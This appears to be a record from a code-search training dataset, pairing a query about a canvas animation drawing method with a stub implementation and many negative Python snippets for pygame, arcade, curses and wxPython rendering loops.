[ "0.7068976", "0.70053196", "0.6794968", "0.67545444", "0.66375184", "0.66362685", "0.65746", "0.6460818", "0.6460818", "0.6460818", "0.6460818", "0.64464664", "0.64366764", "0.6423051", "0.63904214", "0.6366687", "0.6364581", "0.63468754", "0.63468754", "0.63468754", "0.62978816", "0.6290934", "0.6273019", "0.6251459", "0.62476724", "0.62395257", "0.62385046", "0.6224893", "0.61349225", "0.61160195", "0.61045873", "0.6097378", "0.6090018", "0.6048099", "0.6043411", "0.60073525", "0.5974841", "0.5967155", "0.59495264", "0.5938099", "0.59327537", "0.5932522", "0.5928842", "0.59226114", "0.5922082", "0.5912087", "0.5910711", "0.5907897", "0.590756", "0.5901464", "0.5896513", "0.58918786", "0.5878871", "0.5870126", "0.58647794", "0.5846707", "0.58386034", "0.5832981", "0.58222985", "0.58190364", "0.581843", "0.5813032", "0.5812299", "0.5809203", "0.5807177", "0.58064437", "0.5800713", "0.5800441", "0.5794315", "0.5794315", "0.5793278", "0.57868004", "0.57862043", "0.5769935", "0.576974", "0.5757159", "0.57402724", "0.5729087", "0.57290745", "0.57244146", "0.5709976", "0.56928456", "0.56807226", "0.56748706", "0.56732655", "0.56731117", "0.5671205", "0.56705725", "0.5662223", "0.5659172", "0.56587535", "0.5652816", "0.56461185", "0.5640305", "0.5638301", "0.5636397", "0.56319577", "0.5631324", "0.562536", "0.56091505" ]
0.8466848
0
Implement your canvas animation drawing logic here; returning False will stop the rendering, and returning True will continue it
def draw_animation(self, canvas, animation_tick) -> bool: return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def draw(self, canvas) -> bool:\n return False", "def draw(self):\r\n if not self.stopped:\r\n super().draw()\r\n self.next_frame()", "def on_draw(self, widget, cr):\n #print \"starting to draw\"\n if self.double_buffer is not None:\n self.draw_tiles()\n cr.set_source_surface(self.double_buffer, 0.0, 0.0)\n cr.paint()\n else:\n print('Invalid double buffer')\n #print \"done drawing\"\n return False", "def paintGL(self):\n print \"Entereing paintGL\"\n if self.bDrawing == True:\n print \"Drawing was true so quit\"\n return\n \n \n self.bDrawing = True\n threadDrawGL = threading.Thread(target = self.drawGLScene)\n threadDrawGL.start()\n #self.drawGLScene()", "def draw (self, screen):\n drew = bool(self.draw_fn(self, screen, self.dirty))\n self.dirty = False\n return drew", "def draw():", "def draw(self):\n if self.node:\n if self.async:\n if self.cancel_draw:\n self.after_cancel(self.cancel_draw)\n self.cancel_draw = self.after(3, self._draw)\n else: self._draw()", "def _run(self):\n self._is_running = False\n self.start()\n self._pos += 1\n self.draw(self.img)", "def on_draw_event(self, widget, ctx):\n # the _need_redraw flag doesnt work. it sometimes prevents\n # the rendering and leaving the canvas blank\n #if self._need_redraw:\n self._renderer.set_context(ctx)\n allocation = self.get_allocation()\n x, y, w, h = allocation.x, allocation.y, allocation.width, allocation.height\n self._render_figure(w, h)\n #self._need_redraw = False\n\n return False # finish event propagation?", "def update(self):\n check_key_press = lambda key: self._window.was_key_pressed(key)\n frame = self._current_image.copy()\n\n for key, event in self._key_events.items():\n if check_key_press(key):\n event()\n\n for annotation in self._annotations:\n annotation.draw(frame)\n\n if self._annotation_in_progress is not None:\n self._annotation_in_progress.draw(frame)\n\n self.show_controls(frame)\n\n self._window.draw(frame)\n return not self._window.should_quit", "def game_draw(self):\n pass", "def draw(self):", "def draw(self):\n pass", "def draw(self):\n pass", "def draw(self):\n pass", "def draw(self):\n pass", "def draw(self):\n\t\tpass", "def _prepare_draw(self, view=None):\n return True", "def EndDraw(self):\r\n\r\n pass", "def repaint(self):\n self.screen.blit(self.source, (0, 0))\n self.lcd.draw(self.lcddraw)\n if self.drawmode & self.DRAW_CIRCLE:\n self.plot_circle()\n pygame.display.flip()", "def draw(canvas):\n\n max_row, max_col = canvas.getmaxyx()\n canvas.nodelay(True)\n\n COROUTINES.append(fire(canvas, max_row // 2, max_col // 2))\n COROUTINES.append(animate_spaceship(canvas, max_row // 2, max_col // 2 - 2, max_row, max_col))\n COROUTINES.append(fill_orbit_with_garbage(canvas))\n for i in range(STARS_AMOUNT):\n column = random.randint(1, max_col - 1)\n row = random.randint(1, max_row - 1)\n symbol = random.choice('+*.:')\n COROUTINES.append(blink(canvas, row, column, random.randint(0, 10), symbol))\n\n while COROUTINES:\n curses.curs_set(False)\n canvas.border()\n for coroutine in COROUTINES:\n try:\n coroutine.send(None)\n except StopIteration:\n COROUTINES.remove(coroutine)\n if len(COROUTINES) == 0:\n break\n canvas.refresh()\n time.sleep(TIC_TIMEOUT)", "def run_animation(self):\n self.animation = True\n self.fig = plt.figure()\n anim_running = True\n\n def onClick(event):\n nonlocal anim_running\n if anim_running:\n anim.event_source.stop()\n anim_running = False\n else:\n anim.event_source.start()\n anim_running = True\n\n self.fig.canvas.mpl_connect('button_press_event', onClick)\n anim = 
FuncAnimation(self.fig, self.update, fargs=None, interval=5)\n plt.show()", "def _logic(self):\n yes = self.yes_button.was_pressed or self.yes_button.pressed\n no = self.no_button.was_pressed or self.no_button.pressed\n\n # render\n if self.render_timer.finished:\n # start = time()\n self.window_renderer.update(self.buffer_image.tobytes())\n # debug(\"render time: %s\", time() - start)\n self.render_timer.start()\n\n if self.state == STATE_DEFAULT:\n if (no and not self.disable_quit) or (no and yes):\n self._enter_state(STATE_EXIT_PROMPT)\n elif yes:\n self._enter_state(STATE_PREPARE)\n\n elif self.state == STATE_EXIT_PROMPT:\n if yes:\n return False\n elif no:\n self._enter_state(STATE_DEFAULT)\n\n elif self.state == STATE_PREPARE:\n if no:\n self._enter_state(STATE_DEFAULT)\n elif self.countdown_timer.finished:\n self.pictures_taken = list()\n self.camera_controller.clear_workdir()\n self._enter_state(STATE_PICTURE_COUNTDOWN)\n\n elif self.state == STATE_PICTURE_COUNTDOWN:\n if no:\n self._enter_state(STATE_DEFAULT)\n elif self.countdown_timer.finished:\n self.pictures_taken.append(self.camera_controller.capture_photo())\n self._enter_state(STATE_PICTURE_TAKEN)\n else:\n self.window.find_by_name(NAME_GET_STARTED).text = \"\" \\\n + str(len(self.pictures_taken) + 1) + \" of \" + str(self.picture_count) \\\n + \"\\n\" + str(int(self.countdown_timer.remaining) + 1)\n\n elif self.state == STATE_PICTURE_TAKEN:\n if no:\n self._enter_state(STATE_DEFAULT)\n elif self.countdown_timer.finished:\n if len(self.pictures_taken) >= self.picture_count:\n t = threading.Thread(target=self._upload_to_twitter)\n t.start()\n self._enter_state(STATE_PRINT)\n else:\n self._enter_state(STATE_PICTURE_COUNTDOWN)\n\n elif self.state == STATE_PRINT:\n if no:\n self._enter_state(STATE_DEFAULT)\n elif yes:\n self._enter_state(STATE_PRINTING)\n\n elif self.state == STATE_PRINTING:\n if no:\n self._enter_state(STATE_DEFAULT)\n else:\n strip_file = self.create_strip()\n args = self.print_command.replace('{filename}', strip_file).split()\n subprocess.Popen(args)\n self._enter_state(STATE_COMPLETED)\n\n elif self.state == STATE_COMPLETED:\n if yes or no or self.countdown_timer.finished:\n self._enter_state(STATE_DEFAULT)\n\n else:\n raise RuntimeError(\"The app is in an unknown state: \" + str(self.state))\n\n return True", "def _update_anim(self):\n if self._skip_frames > 1:\n # Do not render while _skip_frames is > 1\n self._skip_frames -= 1\n else:\n # Render frame\n self._visualization.taskMgr.step()\n # Calculate number of frames that need to be skipped\n self._skip_frames = int(1 / self._fps / self._dt)", "def drawStar(duration):\n # START CODE HERE #\n\n\n pass\n # END CODE HERE # (remove the pass statement)", "def pre_draw(self):", "def draw(self):\n self.figure.canvas.draw_idle()", "def draw(self):\n # IMPLEMENT ME\n \"\"\"\n GRectangle(x=GAME_WIDTH/2,y=GAME_HEIGHT/2,\n width=GAME_WIDTH,height=GAME_HEIGHT,\n fillcolor=introcs.RGB(0,0,0)).draw(self.view)\n if self.getState() == STATE_INACTIVE:\n self.getText().draw(self.view)\n if self.getState() == STATE_PAUSED:\n self.getText().draw(self.view)\n if not self.getWave() is None:\n self.getWave().draw(self.view)\n if self.getState() == STATE_COMPLETE:\n self.getText().draw(self.view)\n if self.getState() == STATE_PAUSED or self.getState() == STATE_ACTIVE or self.getState() == STATE_COMPLETE:\n self.getText().draw(self.view)\n\n GRectangle(x=GAME_WIDTH/2,y=GAME_HEIGHT/2,\n width=GAME_WIDTH,height=GAME_HEIGHT,\n fillcolor=introcs.RGB(0,0,0)).draw(self.view)\"\"\"\n 
if not self.getText() is None:\n self.getText().draw(self.view)\n if not self.getWave() is None:\n self.getWave().draw(self.view)", "def _draw(self, canvas, options):\n pass # must override in subclass", "def draw(self):\n if self.is_clicked:\n pg.draw.circle(self.window, self.color, (self.x, self.y), self.r, 0)\n else:\n pg.draw.circle(self.window, self.color, (self.x, self.y), self.r, 1)", "def on_draw(self):\n # Clearing the buffers\n self.clear()\n self.set3d()\n # Makes it so color can be added\n glColor3d(1, 1, 1)\n\n self.push(self.player.pos, self.player.rot)\n self.model.draw()\n glPopMatrix()\n self.model.process_queue_slowly()\n\n # Draws the crosshairs on the screen\n self.set2d()\n self.draw_position_label()\n self.draw_reticle()", "def execute(self):\n while(self._running):\n for event in pygame.event.get():\n self.event_handler(event)\n \"\"\"Drawing\"\"\"\n if self.state == self.states['Game']:\n self.update_state()\n self.move()\n\n self.render()\n self.cleanup()", "def draw(self):\n if self.visible:\n glColor3f(self.r, self.g, self.b)\n graphicsBall(self.x, self.y, self.radius)\n\n if self.number <= 8:\n glColor3f(1.0, 1.0, 1.0)\n else:\n glColor3f(0.0, 0.0, 0.0)\n\n graphicsBall(self.x, self.y, self.radius / 2)\n\n if self.number > 0:\n if self.number > 8:\n glColor3f(1.0, 1.0, 1.0)\n else:\n glColor3f(0.0, 0.0, 0.0)\n\n if self.number < 10:\n graphicsText(self.x - 2, self.y - 3.5, str(self.number))\n else:\n graphicsText(self.x - 4.5, self.y - 3.5, str(self.number))", "def draw(self):\n raise NotImplementedError", "def draw(self):\n raise NotImplementedError", "def draw(self):\n raise NotImplementedError", "def draw(self, screen):", "def draw(self):\n\n for row in self._board:\n for slot in row:\n if slot == 0:\n return False\n print \"It's a draw!\"\n return True", "def draw(self, surface, tick, camera, size):\n\t\tif self._state == Character.STANDING:\n\t\t\tself._stand_animation.draw(surface, self._collision_rect.x - camera[0], self._collision_rect.y - camera[1],\n\t\t\t\t\t\t\t\t\t tick)\n\t\telif self._state == Character.WALKING:\n\t\t\tself._walk_animation.draw(surface, self._collision_rect.x - camera[0], self._collision_rect.y - camera[1],\n\t\t\t\t\t\t\t\t\t tick, self._direction == Character.LEFT)\n\t\telif self._state == Character.JUMPING:\n\t\t\tif self._direction == Character.NONE:\n\t\t\t\tself._jump_animation.draw(surface, self._collision_rect.x - camera[0],\n\t\t\t\t\t\t\t\t\t\t self._collision_rect.y - camera[1], tick)\n\t\t\telse:\n\t\t\t\tself._jump_right_animation.draw(surface, self._collision_rect.x - camera[0],\n\t\t\t\t\t\t\t\t\t\t\t\tself._collision_rect.y - camera[1], tick,\n\t\t\t\t\t\t\t\t\t\t\t\tself._direction == Character.LEFT)\n\t\tif Character.DEBUG:\n\t\t\tmove = camera[:]\n\t\t\tmove[0] *= -1\n\t\t\tmove[1] *= -1\n\t\t\tpygame.draw.rect(surface, (255, 255, 255), self._collision_rect.move(move), 2)\n\t\t\tpygame.draw.rect(surface, (255, 0, 0), self._top_rect.move(move), 1)\n\t\t\tpygame.draw.rect(surface, (255, 0, 0), self._bottom_rect.move(move), 1)\n\t\t\tpygame.draw.rect(surface, (0, 0, 255), self._left_rect.move(move), 1)\n\t\t\tpygame.draw.rect(surface, (0, 0, 255), self._right_rect.move(move), 1)", "def _animation_over(self) -> bool:\n \treturn self.current_height == 0 or self.current_height == self.original_height", "def is_animation_running(self):\n return self._run_animation", "def draw(self):\n self.batch.draw()", "def on_draw(self):\n # draw everything", "def tick(self):\n # detect pressed keys\n if not self.handle_events():\n 
return False\n # redraw\n if self.pause:\n return True\n self.phy.tick()\n color = 0\n self.screen.fill((0, 0, 0))\n new_image = pygame.Surface(self.screen.get_size()).convert()\n for p in self.phy.objects:\n self.put_object(new_image, p, COLORS[color])\n color = (color + 1) % len(COLORS)\n self.screen.blit(new_image, (0, 0))\n color = 0\n for p in self.phy.objects:\n text = \"%.2E\" % (int(p.mass))\n self.put_text(\n text,\n COLORS[color], (\n int(p.position[0] / SCALE_FACTOR) - len(text) * 5,\n int(p.position[1] / SCALE_FACTOR + int(p.radius) / SCALE_FACTOR * 1.2)\n )\n )\n color = (color + 1) % len(COLORS)\n self.show_status()\n pygame.display.set_icon(self.surficon)\n pygame.display.flip()\n return True", "def draw(self):\n with self:\n self.batch.draw()", "def draw(self):\n self.write_image()\n self.update()", "def draw(self):\n i = 0\n self.window.fill((60,50,20))\n for i in range(len(self.board)):\n for j in range(len(self.board[i])):\n pygame.draw.rect(self.window, ((i+j)%2*255, (i+j)%2*255, (i+j)%2*255), (20+j*100, 20+i*100, 100, 100))\n if self.board[i][j] != 0:\n if self.board[i][j].player == 0:\n color = (200, 0, 0)\n else:\n color = (0, 0, 200)\n if self.board[i][j].direction == 0:\n pygame.draw.ellipse(self.window, color, (30+j*100, 40+i*100, 80, 60))\n elif self.board[i][j].direction == 1:\n pygame.draw.ellipse(self.window, color, (40+j*100, 30+i*100, 60, 80))\n if self.board[i][j].master:\n if self.board[i][j].direction == 0:\n pygame.draw.ellipse(self.window, (255,255,0), (40+j*100, 50+i*100, 60, 40))\n pygame.draw.ellipse(self.window, color, (45+j*100, 55+i*100, 50, 30))\n elif self.board[i][j].direction == 1:\n pygame.draw.ellipse(self.window, (255,255,0), (50+j*100, 40+i*100, 40, 60))\n pygame.draw.ellipse(self.window, color, (55+j*100, 45+i*100, 30, 50))\n \n if self.selected != None:\n pygame.draw.rect(self.window, (200, 200, 0), (20+self.selected[1]*100, 20+self.selected[0]*100, 100, 100), 5)\n pygame.display.flip()", "def update(self, screen) -> bool:\n # Current animation frame is less than 10\n if self.curr_frame < 10:\n exp = pygame.image.load(\"images/exp\" + str(self.curr_frame) + \".png\").convert_alpha()\n exp = pygame.transform.scale(exp, (self.width, self.height))\n screen.blit(exp, (self.x, self.y))\n return True\n # Current animation frame is greater/equal to 10\n else:\n self.curr_frame = 1\n return False", "def do_paint(self):\r\n curses.curs_set(0)\r\n if self.win:\r\n self.paint()\r\n self.done_paint()", "def draw():\n background(255)\n for i in range(COLS):\n for j in range(ROWS):\n if (BOARD[i][j] == 1): fill(0)\n else: fill(255)\n noStroke() # stroke(0)\n rect(i * CELL_SIZE, j * CELL_SIZE, CELL_SIZE, CELL_SIZE)\n if (PLAY):\n generate()", "def _onPaint(self, evt):\n if not self._isRealized:\n self.realize()\n if self._drawn < 2:\n self.draw(repaint = False)\n self._drawn += 1\n self.gui_repaint(drawDC=wx.PaintDC(self))", "def draw (self):\n screen = self.screen\n dirty = False\n for z, displays in self.layers.iteritems():\n for display in displays:\n drew = display.draw(screen)\n # if made changes to the surface\n if drew:\n # set any displays that overlap this one dirty\n for d in display.overlapped:\n d.dirty = True\n dirty |= drew\n return dirty", "def draw(self):\n return self._myCanvas.draw()", "def draw (self):\n screen = self.screen\n dirty = False\n for display in self.displays:\n dirty |= display.draw(screen)\n return dirty", "def draw(canvas):\n\n # draw the background graphic\n canvas.draw_image(background, (150, 150), (300, 300), (150, 
150), (300, 300))\n\n # draw the stopwatch text\n canvas.draw_text(time, [centre_x(time, time_font_size, font_face_all), 143], time_font_size, colour_time, font_face_all)\n\n # draw the score as 'correct guesses / total guesses'\n canvas.draw_text(score_total, [200, 40], score_message_font_size, colour_score, font_face_all)\n\n # draw the score message\n if message_displayed:\n # modulus loops all the colours in rainbow\n # colour_count incremented in message_colour_tick\n rainbow_colour = colour_count % len(rainbow)\n canvas.draw_text(event_message, [message_x, 70], message_event_font_size, rainbow[rainbow_colour], font_face_all)\n\n # draw the animated stars (two white dots)\n canvas.draw_text(\".\", [star_x, 86], 12, colour_stars, font_face_all)\n canvas.draw_text(\".\", [star_x, 165], 12, colour_stars, font_face_all)\n\n # draw the achievement badges\n if my_score >= 5:\n canvas.draw_image(cheevo5, (10, 10), (21, 20), (12, 31), (21, 20))\n if my_score >= 10:\n canvas.draw_image(cheevo10, (10, 10), (21, 20), (35, 31), (21, 20))\n if my_score >= 25:\n canvas.draw_image(cheevo25, (10, 10), (21, 20), (58, 31), (21, 20))\n if my_score >= 50:\n canvas.draw_image(cheevo50, (10, 10), (21, 20), (81, 31), (21, 20))\n if my_score >= 100:\n canvas.draw_image(cheevo100, (10, 10), (21, 20), (104, 31), (21, 20))\n\n # draw the score streak counters\n canvas.draw_text(\"Current Streak:\", [30, 180], score_streak_font_size, colour_streak, font_face_all)\n canvas.draw_text(str(current_streak), [125, 180], score_streak_font_size, colour_streak, font_face_all)\n canvas.draw_text(\"Best Streak:\", [170, 180], score_streak_font_size, colour_streak, font_face_all)\n canvas.draw_text(str(best_streak), [247, 180], score_streak_font_size, colour_streak, font_face_all)", "def draw(self, *args, **kwargs):\n self.window.clear()\n self.batch.draw()", "def can_draw(self,point):\n if point <= 0:\n return False\n else:\n return True", "def main(self):\n\t\t\tfactor = 0.0\n\t\t\tif self.time.time() > (self.startTime + self.showTime + self.displayTime + self.hideTime):\n\t\t\t\tself.end()\n\t\t\telif self.time.time() > (self.startTime + self.showTime + self.displayTime):\n\t\t\t\t#Hide animation will occur here.\n\t\t\t\tfactor = (self.hideTime - (self.time.time() - (self.startTime + self.showTime + self.displayTime))) / self.hideTime\n\t\t\t\tself.frame.colors = [(0.2, 0.2, 0.2, (0.8 * factor)) for i in range(4)]\n\t\t\t\tself.frame._update_position(self.frame._base_size, [0.7, (1.0 - (0.2 * factor))])\n\t\t\t\tself.display._update_position(self.display._base_size, self.display._base_pos)\n\t\t\t\tself.display.text = self.text\n\t\t\t\n\t\t\telif self.time.time() > (self.startTime + self.showTime):\n\t\t\t\tif self.frame._base_pos != [0.7, 0.8]:\n\t\t\t\t\tself.frame._update_position(self.frame._base_size, [0.7, 0.8])\n\t\t\t\t\tself.display._update_position(self.display._base_size, self.display._base_pos)\n\t\t\t\t\tself.display.text = self.text\n\t\t\t\n\t\t\telse:\n\t\t\t\t#play show animation.\n\t\t\t\tfactor = (self.time.time() - self.startTime) / self.showTime\n\t\t\t\tself.frame.colors = [(0.2, 0.2, 0.2, (0.8 * factor)) for i in range(4)]\n\t\t\t\tself.frame._update_position(self.frame._base_size, [0.7, (1.0 - (0.2 * factor))])\n\t\t\t\tself.display._update_position(self.display._base_size, self.display._base_pos)\n\t\t\t\tself.display.text = self.text", "def paint(self):\r\n pass", "def requires_rendering(self, skip_bool_switch=False):\n if self.sorting_active: \n # This is to ensure the last frame when the 
thread is complete is still rendered\n if (not skip_bool_switch):\n self.sorting_active = self.thread.is_alive()\n return True\n else:\n return False", "def drawCells(self):\r\n self.drawing = not self.drawing\r\n if self.drawing:\r\n self.draw_button['text'] = \"No Draw\"\r\n else:\r\n self.draw_button['text'] = \"Draw\"", "def on_draw_over_image(self):", "def on_draw(self):\n arcade.start_render()", "def run(self, reset=False):\n if reset:\n self.m_btn_pause = False\n self.m_current_index = 0\n self.m_history_shapes.clear()\n\n if self.m_stop:\n self.m_stop = False\n return\n\n if not self.m_btn_pause and not self.m_scl_pause:\n if 0 <= self.m_current_index < len(self.m_history) and self.m_animation_speed > 0:\n self.render()\n self.m_current_index += 1\n elif 0 < self.m_current_index <= len(self.m_history) and self.m_animation_speed < 0:\n self.m_canvas.delete(self.m_history_shapes.pop())\n self.m_current_index -= 1\n self.update_info()\n\n self.m_canvas.after(abs(self.m_animation_speed), self.run)", "def draw_frame(self):\n self.render_surface.fill((135, 206, 235))\n # self.render_surface.fill((33, 38, 63))\n self.render_surface.blit(\n self.moon,\n (self.RENDER_SURFACE_WIDTH - 150, 80),\n special_flags=pygame.BLEND_ADD,\n )\n\n # draw background\n self.draw_background()\n\n self.render_surface.blit(\n self.assets.get_character_image(self.player),\n self.camera.translate(self.player.rect),\n )\n\n for enemy in self.enemies:\n pygame.draw.rect(\n self.render_surface, enemy.color, self.camera.translate(enemy.rect)\n )\n self.draw_enemy_health(enemy)\n\n # code to mask perticular block type.\n # for i in self.chunked_map.get_blocks():\n # if i.block_type == 4:\n # pygame.draw.rect(\n # self.render_surface, (255, 255, 255), self.camera.translate(i.rect)\n # )\n\n # draw tiles\n tiles = filter(\n lambda tile: not isinstance(tile, Reward) or tile.is_valid,\n self.chunked_map.get_blocks(),\n )\n tiles = map(self.get_tile_blit_seq, tiles)\n self.render_surface.blits(tiles)\n\n # draw particles\n for particle in self.particle_system.get_active_particles():\n pygame.draw.circle(\n self.render_surface,\n particle.color,\n self.camera.translate_xy(particle.center),\n particle.radius,\n )\n\n # self.draw_fps()\n # self.draw_score()\n self.draw_player_health()\n if self.player.attack_arc_end_deg != 300:\n self.draw_attack_arc(self.player)\n\n for enemy in filter(lambda e: e.attack_arc_end_deg != 300, self.enemies):\n self.draw_attack_arc(enemy)\n\n if not self.player.read_to_take_damage:\n red_s = pygame.Surface(\n (self.RENDER_SURFACE_WIDTH, self.RENDER_SURFACE_HEIGHT)\n )\n red_s.fill((100, 0, 0))\n self.render_surface.blit(red_s, (0, 0), special_flags=pygame.BLEND_ADD)", "def _redraw(self, render_as_done: \"bool\" = False) -> \"None\":\n if not self.drawn:\n cast(\"Application\", super())._redraw(render_as_done=True)\n self.drawn = True", "def run(self):\n while True:\n if self.game_over: \n return \n\n self.handle_events() \n if self.paused:\n continue\n\n self.update_generation()\n self.draw_grid()\n\n self.cap_frame_rate()", "def on_draw(delta_time):\n # draws all our objects\n arcade.start_render()\n\n generate_grid()\n apple()\n snake(on_draw.snake_part_x, on_draw.snake_part_y, 20, 20, snake_color)\n snake(on_draw.snake_part2_x, on_draw.snake_part2_y, 20, 20, snake_color)\n snake(on_draw.snake_part3_x, on_draw.snake_part3_y, 20, 20, snake_color)\n snake(on_draw.snake_part4_x, on_draw.snake_part4_y, 20, 20, snake_color)\n snake(on_draw.snake_part5_x, on_draw.snake_part5_y, 20, 20, 
snake_color)\n snake(on_draw.snake_part6_x, on_draw.snake_part6_y, 20, 20, snake_color)\n\n\n if on_draw.snake_part_x <= 230:\n snake(on_draw.snake_part6_x + 20, on_draw.snake_part6_y, 20, 20, snake_color)\n\n\n \"\"\" If statements that will make snake part one move \"\"\"\n if on_draw.snake_part_x >= 550:\n on_draw.snake_part_x -= 20\n\n elif on_draw.snake_part_x <= 550:\n on_draw.snake_part_y += 20\n if on_draw.snake_part_y >= 500:\n on_draw.snake_part_y -= 20\n on_draw.snake_part_x -= 20\n if on_draw.snake_part_x <= 180:\n on_draw.snake_part_x += 20\n\n \"\"\" If statements that will make snake part two move \"\"\"\n if on_draw.snake_part2_x >= 550:\n on_draw.snake_part2_x -= 20\n\n elif on_draw.snake_part2_x <= 550:\n on_draw.snake_part2_y += 20\n if on_draw.snake_part2_y >= 500:\n on_draw.snake_part2_y -= 20\n on_draw.snake_part2_x -= 20\n if on_draw.snake_part2_x <= 200:\n on_draw.snake_part2_x += 20\n\n \"\"\" If statements that will make snake part three move \"\"\"\n if on_draw.snake_part3_x >= 550:\n on_draw.snake_part3_x -= 20\n\n elif on_draw.snake_part3_x <= 550:\n on_draw.snake_part3_y += 20\n if on_draw.snake_part3_y >= 500:\n on_draw.snake_part3_y -= 20\n on_draw.snake_part3_x -= 20\n if on_draw.snake_part3_x <= 220:\n on_draw.snake_part3_x += 20\n\n \"\"\" If statements that will make snake part four move \"\"\"\n if on_draw.snake_part4_x >= 550:\n on_draw.snake_part4_x -= 20\n\n elif on_draw.snake_part4_x <= 550:\n on_draw.snake_part4_y += 20\n if on_draw.snake_part4_y >= 500:\n on_draw.snake_part4_y -= 20\n on_draw.snake_part4_x -= 20\n if on_draw.snake_part4_x <= 240:\n on_draw.snake_part4_x += 20\n\n \"\"\" If statements that will make snake part five move \"\"\"\n if on_draw.snake_part5_x >= 550:\n on_draw.snake_part5_x -= 20\n\n elif on_draw.snake_part5_x <= 550:\n on_draw.snake_part5_y += 20\n if on_draw.snake_part5_y >= 500:\n on_draw.snake_part5_y -= 20\n on_draw.snake_part5_x -= 20\n if on_draw.snake_part5_x <= 260:\n on_draw.snake_part5_x += 20\n\n \"\"\" If statements that will make snake part six move \"\"\"\n if on_draw.snake_part6_x >= 550:\n on_draw.snake_part6_x -= 20\n\n elif on_draw.snake_part6_x <= 550:\n on_draw.snake_part6_y += 20\n if on_draw.snake_part6_y >= 500:\n on_draw.snake_part6_y -= 20\n on_draw.snake_part6_x -= 20\n if on_draw.snake_part6_x <= 280:\n on_draw.snake_part6_x += 20", "def isOnCanvas(self, x, y):\n return 0 <= x < self.width and 0 <= y < self.height", "def draw(self) -> Any:", "def on_draw(self):\n\n # Clear the screen and start drawing\n arcade.start_render()\n\n # Draw the rectangles\n for shape in self.shapes:\n shape.draw()", "def TestAnimation(self,event=None):\n wx.GetApp().Yield(True)\n Range = (-10,10)\n self.Range = Range\n\n self.UnBindAllMouseEvents()\n Canvas = self.Canvas\n Canvas.InitAll()\n\n ## Random tests of everything:\n colors = self.colors\n # Rectangles\n for i in range(3):\n xy = (random.uniform(Range[0],Range[1]), random.uniform(Range[0],Range[1]))\n lw = random.randint(1,5)\n cf = random.randint(0,len(colors)-1)\n wh = (random.randint(1,5), random.randint(1,5) )\n Canvas.AddRectangle(xy, wh, LineWidth = lw, FillColor = colors[cf])\n\n # Ellipses\n for i in range(3):\n xy = (random.uniform(Range[0],Range[1]), random.uniform(Range[0],Range[1]))\n lw = random.randint(1,5)\n cf = random.randint(0,len(colors)-1)\n wh = (random.randint(1,5), random.randint(1,5) )\n Canvas.AddEllipse(xy, wh, LineWidth = lw, FillColor = colors[cf])\n\n # Circles\n for i in range(5):\n xy = 
(random.uniform(Range[0],Range[1]),random.uniform(Range[0],Range[1]))\n D = random.randint(1,5)\n lw = random.randint(1,5)\n cf = random.randint(0,len(colors)-1)\n cl = random.randint(0,len(colors)-1)\n Canvas.AddCircle(xy, D, LineWidth = lw, LineColor = colors[cl], FillColor = colors[cf])\n Canvas.AddText(\"Circle # %i\"%(i), xy, Size = 12, BackgroundColor = None, Position = \"cc\")\n\n # Lines\n for i in range(5):\n points = []\n for j in range(random.randint(2,10)):\n point = (random.randint(Range[0],Range[1]),random.randint(Range[0],Range[1]))\n points.append(point)\n lw = random.randint(1,10)\n cf = random.randint(0,len(colors)-1)\n cl = random.randint(0,len(colors)-1)\n Canvas.AddLine(points, LineWidth = lw, LineColor = colors[cl])\n\n # Polygons\n for i in range(3):\n points = []\n for j in range(random.randint(2,6)):\n point = (random.uniform(Range[0],Range[1]),random.uniform(Range[0],Range[1]))\n points.append(point)\n lw = random.randint(1,6)\n cf = random.randint(0,len(colors)-1)\n cl = random.randint(0,len(colors)-1)\n Canvas.AddPolygon(points,\n LineWidth = lw,\n LineColor = colors[cl],\n FillColor = colors[cf],\n FillStyle = 'Solid')\n\n # Scaled Text\n String = \"Scaled text\"\n for i in range(3):\n ts = random.random()*3 + 0.2\n cf = random.randint(0,len(colors)-1)\n xy = (random.uniform(Range[0],Range[1]),random.uniform(Range[0],Range[1]))\n Canvas.AddScaledText(String, xy, Size = ts, Color = colors[cf], Position = \"cc\")\n\n\n # Now the Foreground Object:\n C = Canvas.AddCircle((0,0), 7, LineWidth = 2,LineColor = \"Black\",FillColor = \"Red\", InForeground = True)\n T = Canvas.AddScaledText(\"Click to Move\", (0,0), Size = 0.6, Position = 'cc', InForeground = True)\n C.Bind(FloatCanvas.EVT_FC_LEFT_DOWN, self.MoveMe)\n C.Text = T\n\n self.Timer = wx.PyTimer(self.ShowFrame)\n self.FrameDelay = 50 # milliseconds\n\n Canvas.ZoomToBB()", "def draw(self):\n self._background.draw(self.view)\n if self._state == STATE_INACTIVE:\n self._message.draw(self.view)\n if self._state == STATE_COUNTDOWN:\n self._game.draw(self.view)\n self._countdownMessage.draw(self.view)\n self._soundImage.draw(self.view)\n if self._state == STATE_ACTIVE:\n self._game.draw(self.view)\n self._soundImage.draw(self.view)\n if self._state == STATE_PAUSED:\n self._game.draw(self.view)\n self._pausedMessage.draw(self.view)\n if self._state == STATE_RESET:\n self._message.draw(self.view)\n if self._state == STATE_COMPLETE:\n self._game.draw(self.view)\n self._pausedMessage.draw(self.view)", "def stop_projection(self):\r\n self.paint_project_button(False)\r\n self.app.canvas.finish()", "def hitAnimation(self):\r\n self.hit.play()\r\n self.playerRect = self.player.image.get_rect()\r\n self.playerRect = (self.playerLocation[0],self.playerLocation[1],\r\n self.playerRect[2],self.playerRect[3])\r\n for i in xrange(self.maxAlpha,0,-1):\r\n for j in xrange(self.hitAnimationSpeed):\r\n self.display.fill(self.backgroundColor,self.playerRect)\r\n self.player.image.set_alpha(i)\r\n self.drawBoard()\r\n self.enemyGroup.draw(self.display)\r\n self.createCoins()\r\n self.display.blit(self.player.image, self.playerLocation)\r\n self.window.blit(self.display,(self.margin,self.margin))\r\n pygame.display.flip()", "def conditionsAreMetForDrawing(self):\n\t\tcurrentController = self.controller.view().window().windowController()\n\t\tif currentController:\n\t\t\ttool = currentController.toolDrawDelegate()\n\t\t\ttextToolIsActive = tool.isKindOfClass_( NSClassFromString(\"GlyphsToolText\") )\n\t\t\thandToolIsActive = 
